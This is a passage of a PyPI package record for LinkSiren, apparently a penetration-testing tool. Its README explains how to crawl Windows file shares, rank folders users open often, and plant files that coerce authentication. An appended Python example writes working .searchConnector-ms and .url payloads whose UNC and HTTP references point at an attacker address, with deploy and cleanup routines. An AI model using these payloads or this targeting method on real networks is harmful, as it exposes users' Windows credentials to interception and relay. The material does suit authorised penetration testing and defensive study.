Ranks are all set to 1 assigned.\r\n  -is IGNORE_SHARES [IGNORE_SHARES ...], --ignore-shares IGNORE_SHARES [IGNORE_SHARES ...]\r\n                        (Default: 'C$' 'ADMIN$' 'SYSVOL') Do not review the contents of specified shares when crawling as part of the folder ranking process.\r\n  -mc MAX_CONCURRENCY, --max-concurrency MAX_CONCURRENCY\r\n                        (Default: 4) Max number of concurrent processes to use for crawling in rank and identification modes. Note: a maximum of 1 process is used per host. So linksiren will never make multiple simultaneous connections to the same host and concurrent processing will not\r\n                        accelerate crawling multiple shares on a single host.\r\n\r\nRequired Arguments:\r\n  credentials           [domain/]username[:password] for authentication\r\n  -t TARGETS, --targets TARGETS\r\n                        Path to a text file containing UNC paths to file shares / base directories within which to rank folders as potential locations for placing poisoned files.\r\n```\r\n</details>\r\n\r\n### Identify\r\nGiven a list of accessible shares or hosts and customizable constraints, including a maximum number of target folders per share, output UNC paths to the optimal folders for placing poisoned files.\r\n\r\n<details>\r\n<summary>Usage</summary>\r\n\r\n```\r\nlinksiren identify --help\r\nusage: linksiren identify [-h] -t TARGETS [-md MAX_DEPTH] [-at ACTIVE_THRESHOLD] [-f] [-is IGNORE_SHARES [IGNORE_SHARES ...]] [-mf MAX_FOLDERS_PER_TARGET] [-mc MAX_CONCURRENCY] credentials\r\n\r\nIdentify target folders for payload distribution and output to payload_targets.txt\r\n\r\noptions:\r\n  -h, --help            show this help message and exit\r\n  -md MAX_DEPTH, --max-depth MAX_DEPTH\r\n                        (Default: 3) The maximum depth of folders to search within the target\r\n  -at ACTIVE_THRESHOLD, --active-threshold ACTIVE_THRESHOLD\r\n                        (Default: 2) Max number of days since within 
which a file is considered active.\r\n  -f, --fast            (Default: False) Mark folders active as soon as one active file in them is identified and move on. Ranks are all set to 1.\r\n  -is IGNORE_SHARES [IGNORE_SHARES ...], --ignore-shares IGNORE_SHARES [IGNORE_SHARES ...]\r\n                        (Default: 'C$' 'ADMIN$' 'SYSVOL') Do not review the contents of specified shares when crawling as part of the folder ranking and optimal poisoning folder identification process.\r\n  -mf MAX_FOLDERS_PER_TARGET, --max-folders-per-target MAX_FOLDERS_PER_TARGET\r\n                        (Default: 10) Maximum number of folders to output as deployment targets per supplied target share or folder.\r\n  -mc MAX_CONCURRENCY, --max-concurrency MAX_CONCURRENCY\r\n                        (Default: 4) Max number of concurrent processes to use for crawling in rank and identification modes. Note: a maximum of 1 process is used per host. So linksiren will never make multiple simultaneous connections to the same host and concurrent processing will not\r\n                        accelerate crawling multiple shares on a single host.\r\n\r\nRequired Arguments:\r\n  credentials           [domain/]username[:password] for authentication\r\n  -t TARGETS, --targets TARGETS\r\n                        Path to a text file containing UNC paths to file shares / base directories to crawl for optimal locations to write poisoned files.\r\n```\r\n\r\n</details>\r\n\r\n### Deploy\r\nGenerate poisoned files for coercion and deploy them to specified UNC paths. Typically the specified UNC paths are the output of `identify` mode. 
Output a list of UNC paths to folders where payloads were successfully deployed, for use by `cleanup` mode.\r\n\r\n<details>\r\n<summary>Usage</summary>\r\n\r\n```\r\nlinksiren deploy --help\r\nusage: linksiren deploy [-h] -a ATTACKER [-t TARGETS] [-n PAYLOAD] credentials\r\n\r\nDeploy payloads to all folder UNC paths listed one per line in the file specified using --targets\r\n\r\noptions:\r\n  -h, --help            show this help message and exit\r\n  -t TARGETS, --targets TARGETS\r\n                        (Default: 'payload_targets.txt') Path to a text file containing UNC paths to folders into which poisoned files will be deployed.\r\n  -n PAYLOAD, --payload PAYLOAD\r\n                        (Default: @Test_Do_Not_Remove.searchConnector-ms) Name of payload file ending in .library-ms, .searchConnector-ms, .lnk, or .url\r\n\r\nRequired Arguments:\r\n  credentials           [domain/]username[:password] for authentication\r\n  -a ATTACKER, --attacker ATTACKER\r\n                        Attacker IP or hostname to place in poisoned files.\r\n```\r\n</details>\r\n\r\n### Cleanup\r\nRemove all payloads from the specified UNC paths, typically the output of `deploy` mode.\r\n\r\n<details>\r\n<summary>Usage</summary>\r\n\r\n```\r\nlinksiren cleanup --help\r\nusage: linksiren cleanup [-h] [-t TARGETS] credentials\r\n\r\nDelete poisoned files from folder UNC paths specified in --targets\r\n\r\noptions:\r\n  -h, --help            show this help message and exit\r\n  -t TARGETS, --targets TARGETS\r\n                        (Default: 'payloads_written.txt') Path to a text file containing UNC paths to poisoned files to clean up.\r\n\r\nRequired Arguments:\r\n  credentials           [domain/]username[:password] for authentication\r\n```\r\n\r\n</details>\r\n\r\n# Other Information\r\n### What Payload Type Should I Use?\r\nSearch Connectors (.searchConnector-ms): This is generally the best option. 
They require the least amount of interaction, start the WebClient service from a stopped state automatically when the parent folder is opened in Explorer, and are capable of coercing both SMB and HTTP authentication using a single file.\r\n\r\n### How is this better than the other tools?\r\nSummary\r\n- Scales to an arbitrary number of malicious .searchConnector-ms, .library-ms, .url, or .lnk files\r\n- Targeted malicious file placement\r\n- Single-command deployment and cleanup\r\n- Cross-platform (Python)\r\n\r\nAs in real estate, consider the three most important things when attempting to coerce auth using files: location, location, location. All techniques identified here only coerce authentication from users that open the folder containing the poisoned file.\r\n\r\nOther tools are built to place a single malicious .searchConnector-ms, .library-ms, or .url file at a specified location and clean up that one malicious file. If you find yourself with access to a lot of shares, then you may want things to scale and you may not be in the mood to write a wrapper. Additionally, you may not know the best place to put a poisoned file in a sea of accessible shares.\r\n\r\nLinkSiren crawls accessible shares and ranks every subfolder based on the likelihood it will be opened by a user sometime soon. Then it uses this information to target malicious file distribution to multiple locations at once. 
Additionally, LinkSiren records the full UNC path of malicious files it creates, allowing for cleanup with a single command.\r\n\r\n### How will you make it even better?\r\nI'm looking to add the following features:\r\n- [ ] Add safety features:\r\n    - [ ] Check if a file exists before overwriting it with a payload in deploy mode.\r\n    - [ ] Check if files can be deleted from a target path before creating a payload there.\r\n- [ ] Add the ability to deploy files encrypted with EFS to trigger the start of the Encrypting File System (EFS) service on Windows 11 machines so authentication can subsequently be coerced using tools like [Coercer](https://github.com/p0dalirius/Coercer) and [PetitPotam](https://github.com/topotam/PetitPotam).\r\n- [ ] Repackage for use with uv.\r\n- [ ] Add an option for 'invisible' targets for .Library-ms and .searchConnector-ms files where the icon is set to blank and the name is set to a non-printing, valid ASCII character.\r\n- [ ] Test for anonymous access to shares.\r\n- [ ] Enable authentication using an NTLM hash.\r\n- [ ] Enable ticket-based authentication (Kerberos).\r\n- [ ] Add pydantic validation for arguments including targets and output file names.\r\n- [ ] Test the tool through a SOCKS proxy connection to an SMB share generated using ntlmrelayx.\r\n\r\n### Disclaimer\r\nThis tool is designed for ethical hacking and penetration testing. It should be used exclusively on networks where explicit, written permission has been granted for testing. I accept no responsibility for the safety or effectiveness of this tool. Please don't sue me.\r\n",
    "bugtrack_url": null,
    "license": "BSD 3-Clause License  Copyright (c) 2023, gjhami  Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:  1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.  2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.  3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ",
    "summary": "Generation, targeted deployment, and scalable cleanup for files that coerce Windows authentication.",
    "version": "0.0.4",
    "project_urls": {
        "Homepage": "https://github.com/gjhami/LinkSiren",
        "Issues": "https://github.com/gjhami/LinkSiren/issues"
    },
    "split_keywords": [
        "coerce",
        " pentest",
        " windows",
        " authentication",
        " coercion"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "3821c6237f666f828c921d39969bcd9c0e4dc0d1a0213520a9b6b144dfe96dce",
                "md5": "c86396b3ca56e4e02630ed12655d2fd8",
                "sha256": "a556d98afa96bc9b09871a2219e6428a7a3b67b44c1237374c44d473514c8c7c"
            },
            "downloads": -1,
            "filename": "linksiren-0.0.4-py3-none-any.whl",
            "has_sig": false,
            "md5_digest": "c86396b3ca56e4e02630ed12655d2fd8",
            "packagetype": "bdist_wheel",
            "python_version": "py3",
            "requires_python": ">=3.9",
            "size": 29826,
            "upload_time": "2025-01-20T16:41:19",
            "upload_time_iso_8601": "2025-01-20T16:41:19.534212Z",
            "url": "https://files.pythonhosted.org/packages/38/21/c6237f666f828c921d39969bcd9c0e4dc0d1a0213520a9b6b144dfe96dce/linksiren-0.0.4-py3-none-any.whl",
            "yanked": false,
            "yanked_reason": null
        },
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "823a4c11a22d3fc8349d7fadf565eea2e016b5612e0ca0faec93b04261c05005",
                "md5": "e4146dcfe7cf5a268cd9522f902907d0",
                "sha256": "ada6348cfe9d12db106d60f5c70c0a78f394d7da7f24dd94bd22f5df0912fb03"
            },
            "downloads": -1,
            "filename": "linksiren-0.0.4.tar.gz",
            "has_sig": false,
            "md5_digest": "e4146dcfe7cf5a268cd9522f902907d0",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": ">=3.9",
            "size": 59555,
            "upload_time": "2025-01-20T16:41:21",
            "upload_time_iso_8601": "2025-01-20T16:41:21.412038Z",
            "url": "https://files.pythonhosted.org/packages/82/3a/4c11a22d3fc8349d7fadf565eea2e016b5612e0ca0faec93b04261c05005/linksiren-0.0.4.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2025-01-20 16:41:21",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "github_user": "gjhami",
    "github_project": "LinkSiren",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": false,
    "requirements": [
        {
            "name": "impacket",
            "specs": [
                [
                    ">=",
                    "0.11.0"
                ]
            ]
        },
        {
            "name": "tqdm",
            "specs": [
                [
                    ">=",
                    "4.67.1"
                ]
            ]
        }
    ],
    "lcname": "linksiren"
}
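The README embedded in the record above recommends `.searchConnector-ms` payloads because one file coerces both SMB and HTTP authentication, and it describes the deploy/cleanup workflow (record every path written, delete them later) plus a still-open safety item: do not overwrite an existing file with a payload. The following is an added example illustrating those points; it is not LinkSiren's own code. What it assumes, beyond what the README states: the `.searchConnector-ms` layout follows Microsoft's published Search Connector Description schema (the `<iconReference>` and `<simpleLocation><url>` elements, namespace and folder-type GUID are taken from that schema's sample, not from LinkSiren); Explorer resolves `<iconReference>` as a UNC path (SMB) and `<simpleLocation><url>` as an HTTP location handled by the WebClient service; and the `.url` file is the classic `[InternetShortcut]` INI layout whose `IconFile` is fetched when the folder is listed. Target folders are local temp directories standing in for UNC paths, and the attacker address `10.0.0.5` is a constructed value.

```python
"""Constructed illustration of LinkSiren-style payload generation, a local
deploy/cleanup round-trip, and the overwrite check. Not LinkSiren's code."""
import re
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Assumed: namespace and folder-type GUID from Microsoft's Search Connector
# Description schema sample (not values from the LinkSiren README).
NS = "http://schemas.microsoft.com/windows/2009/searchConnector"
FOLDER_TYPE = "{91475FE5-586B-4EBA-8D75-D17434B8CDF6}"
DEFAULT_NAME = "@Test_Do_Not_Remove.searchConnector-ms"  # README's default payload name


def build_search_connector(attacker: str, share: str = "share") -> str:
    """One file, two coercions (assumed behaviour): <iconReference> is a UNC path
    Explorer fetches over SMB; <simpleLocation><url> is an HTTP location the
    WebClient (WebDAV) service authenticates to."""
    unc = f"\\\\{attacker}\\{share}\\icon.ico"
    url = f"http://{attacker}/{share}"
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<searchConnectorDescription xmlns="{NS}">\n'
        "  <description>Microsoft Outlook</description>\n"
        "  <isSearchOnlyItem>false</isSearchOnlyItem>\n"
        "  <includeInStartMenuScope>true</includeInStartMenuScope>\n"
        f"  <iconReference>{unc}</iconReference>\n"
        f"  <templateInfo><folderType>{FOLDER_TYPE}</folderType></templateInfo>\n"
        f"  <simpleLocation><url>{url}</url></simpleLocation>\n"
        "</searchConnectorDescription>\n"
    )


def build_url_shortcut(attacker: str, share: str = "share") -> str:
    """Classic [InternetShortcut] file. Explorer loads IconFile (a UNC path, so
    SMB) just to draw the folder listing; URL is only followed on click."""
    unc = f"\\\\{attacker}\\{share}\\icon.ico"
    return f"[InternetShortcut]\r\nURL=http://{attacker}/{share}\r\nIconIndex=0\r\nIconFile={unc}\r\n"


BUILDERS = {".searchConnector-ms": build_search_connector, ".url": build_url_shortcut}


def coercion_targets(payload: str) -> dict:
    """Classify every attacker reference in a payload body by transport."""
    if payload.lstrip().startswith("<?xml"):
        root = ET.fromstring(payload)
        wanted = (f"{{{NS}}}iconReference", f"{{{NS}}}url")
        refs = [e.text or "" for e in root.iter() if e.tag in wanted]
    else:
        refs = re.findall(r"^(?:URL|IconFile)=(.+)$", payload, re.M)
    out = {"smb": [], "http": []}
    for ref in refs:
        ref = ref.strip()
        if ref.startswith("\\\\"):
            out["smb"].append(ref)
        elif ref.lower().startswith("http://"):
            out["http"].append(ref)
    return out


def deploy(target_dirs, attacker: str, name: str = DEFAULT_NAME) -> list:
    """Write one payload per target folder and return the paths written (the
    record cleanup() consumes). Skips any folder that already holds a file of
    that name, so a real file is never clobbered by a payload."""
    suffix = name[name.index("."):]  # keeps the multi-part ".searchConnector-ms"
    build = BUILDERS[suffix]
    written = []
    for directory in target_dirs:
        dest = Path(directory) / name
        if dest.exists():
            continue
        dest.write_text(build(attacker), encoding="utf-8")
        written.append(str(dest))
    return written


def cleanup(written) -> int:
    """Delete every recorded payload; return how many were removed."""
    removed = 0
    for recorded in written:
        path = Path(recorded)
        if path.exists():
            path.unlink()
            removed += 1
    return removed


def demo(attacker: str = "10.0.0.5") -> dict:
    """Two local folders stand in for UNC targets; one already contains a
    same-named file that must survive both deploy and cleanup."""
    base = Path(tempfile.mkdtemp())
    finance, hr = base / "Finance", base / "HR"
    finance.mkdir()
    hr.mkdir()
    (hr / DEFAULT_NAME).write_text("real file")
    written = deploy([finance, hr], attacker)
    targets = coercion_targets((finance / DEFAULT_NAME).read_text())
    removed = cleanup(written)
    survived = (hr / DEFAULT_NAME).read_text() == "real file"
    return {"written": len(written), "targets": targets, "removed": removed, "survived": survived}
```

`demo()` writes to the Finance folder only, reports one SMB and one HTTP reference inside the generated search connector, removes exactly the file it wrote, and leaves the pre-existing file in HR untouched. The `.url` builder is there for contrast: parsing its output through `coercion_targets()` shows a single SMB reference from `IconFile`, which is why the README ranks search connectors above it.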
        